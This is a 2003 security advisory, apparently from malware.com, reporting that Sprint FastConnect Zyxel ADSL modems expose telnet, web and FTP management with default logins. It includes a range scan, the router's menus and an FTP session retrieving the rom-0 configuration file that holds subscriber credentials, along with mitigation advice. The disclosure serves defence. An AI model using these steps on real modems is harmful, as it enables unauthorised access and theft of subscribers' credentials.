Thursday, January 23 2003
Sprint FastConnect[insert little registration r here]ADSL provides
the Zyxel series of modem/routers to their customers. The problem is
all these devices are factory set with default commonly known
passwords and logins and include a little http, ftp and telnet
server. This allows for remote configuration of the network settings
and host of other things. Including uploading and downloading the
modem configuration file rom-0, rebooting the modem, changing the
modem's remote management login and password, various other "high-
tech" fiddling possibilities. Through both telnet and web.
Certainly not of interest or of need to your generic subscriber.
Quick pretend examination of:
Sprint NETBLK-SPRINTBLK (NET-198-67-0-0-1)
198.67.0.0 - 198.70.255.255
LTD SPRINT FLA ANS ISP FON-332652953698729 (NET-198-70-208-0-1)
198.70.208.0 - 198.70.223.255
shows 800 out of 2000 [of 100,000 or so] affected modems. Closer
examination confirms:
Copyright (c) 1994 - 2002 ZyXEL Communications
Corp.
P645ME+ Main Menu
Getting Started Advanced Management
1. General Setup 21. Filter Set
Configuration
3. Ethernet Setup 22. SNMP Configuration
4. Internet Access Setup 23. System Password
24. System Maintenance
25. IP Routing Policy
Setup
Advanced Applications 26. Schedule Setup
11. Remote Node Setup
12. Static Routing Setup
15. SUA Server Setup 99. Exit
Enter Menu Selection Number:
punching in on our replica modem, number four [4], we get:
Menu 4 - Internet Access Setup
ISP's Name= MyISP
Encapsulation= PPPoE
Multiplexing= LLC-based
VPI #= 8
VCI #= 35
Service Name=
My Login= grandpamalware@malware.com
My Password= ********
Single User Account= Yes
IP Address Assignment= Dynamic
IP Address= N/A
ENET ENCAP Gateway= N/A
Press ENTER to Confirm or ESC to Cancel:
Press ENTER to Confirm or ESC to Cancel:
Playing with our replica modem a bit more we GET:
ftp> open malware.com
Connected to malware.com.
220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
User (malware.com:(none)):
331 Enter PASS command
Password:
230 Logged in
ftp> get rom-0
200 Port command okay
150 Opening data connection for RETR rom-0
226 File sent OK
ftp: 16384 bytes received in 2.03Seconds 8.07Kbytes/sec.
ftp>
Due to our modem only being a replica, we are unable to determine
whether uploading our custom crafted rom-0 file from our second
replica modem to our first, will (a) register the user data from
there to there inclusive of user name and password and or (b)
overwrite the configuration file in such a way our modem then becomes
useless.
But without a doubt, we are not happy to see Grandpappy's private
email address out in the open for the whole world to see.
Notes:
1. The provider suggests that slapping up a web page with
instructions to disable this "feature" will be the solution. We would
suggest fire-walling off the entire affected user base ftp, http and
telnet ports, rolling out the trucks, physically reconfiguring each
and every affected subscriber's modem or replacing them
2. PRIVACY PRIVACY PRIVACY. In this day and age, it is all we have
left !
3. http://www.wired.com/news/infostructure/0,1377,57342,00.html
4. Victims of this contact your provider asa possible and have them
hand-hold you through disabling this "feature". Better yet, insist
they send over the installer to do it for you. After all it should
have been done at time of installation.
End Call
--
http://www.malware.com
